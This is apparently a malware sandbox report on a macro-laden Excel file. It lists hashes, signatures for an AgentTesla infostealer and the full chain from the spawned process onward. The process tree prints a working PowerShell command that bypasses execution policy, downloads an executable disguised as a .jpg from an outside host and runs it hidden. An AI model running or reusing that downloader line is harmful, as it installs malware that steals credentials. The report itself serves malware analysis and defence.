Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
136s -
platform
windows7_x64 -
resource
win7 -
submitted
10/07/2020, 07:13
Static task
static1
Behavioral task
behavioral1
Sample
CO-MFE-6-2020.xlsm
Resource
win7
Behavioral task
behavioral2
Sample
CO-MFE-6-2020.xlsm
Resource
win10v200430
General
-
Target
CO-MFE-6-2020.xlsm
-
Size
173KB
-
MD5
84ba27c4b3083be263a54322adec3149
-
SHA1
2548d9097c1b27f064a7089afe393fde0fbfa64d
-
SHA256
fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011
-
SHA512
1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e
Malware Config
Extracted
http://shopcart.indbytes.com/cig/4501307788.jpg
Signatures
-
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1072 EXCEL.EXE 1072 EXCEL.EXE 1072 EXCEL.EXE 1132 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1784 powershell.exe 1784 powershell.exe 1132 RegAsm.exe 1132 RegAsm.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 5 1784 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1072 EXCEL.EXE -
Executes dropped EXE 1 IoCs
pid Process 1984 Name.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Office loads VBA resources, possible macro or embedded object present
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe Name.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1780 1072 cmd.exe 23 -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1072 wrote to memory of 1780 1072 EXCEL.EXE 24 PID 1072 wrote to memory of 1780 1072 EXCEL.EXE 24 PID 1072 wrote to memory of 1780 1072 EXCEL.EXE 24 PID 1780 wrote to memory of 1784 1780 cmd.exe 26 PID 1780 wrote to memory of 1784 1780 cmd.exe 26 PID 1780 wrote to memory of 1784 1780 cmd.exe 26 PID 1784 wrote to memory of 1984 1784 powershell.exe 28 PID 1784 wrote to memory of 1984 1784 powershell.exe 28 PID 1784 wrote to memory of 1984 1784 powershell.exe 28 PID 1784 wrote to memory of 1984 1784 powershell.exe 28 PID 1984 wrote to memory of 1132 1984 Name.exe 29 PID 1984 wrote to memory of 1132 1984 Name.exe 29 PID 1984 wrote to memory of 1132 1984 Name.exe 29 PID 1984 wrote to memory of 1132 1984 Name.exe 29 PID 1984 wrote to memory of 1132 1984 Name.exe 29 PID 1984 wrote to memory of 1132 1984 Name.exe 29 PID 1984 wrote to memory of 1132 1984 Name.exe 29 PID 1984 wrote to memory of 1132 1984 Name.exe 29 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 1132 RegAsm.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1984 Name.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1984 set thread context of 1132 1984 Name.exe 29 -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')3⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\Name.exe"C:\Users\Admin\AppData\Local\Temp\Name.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1984 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
-
-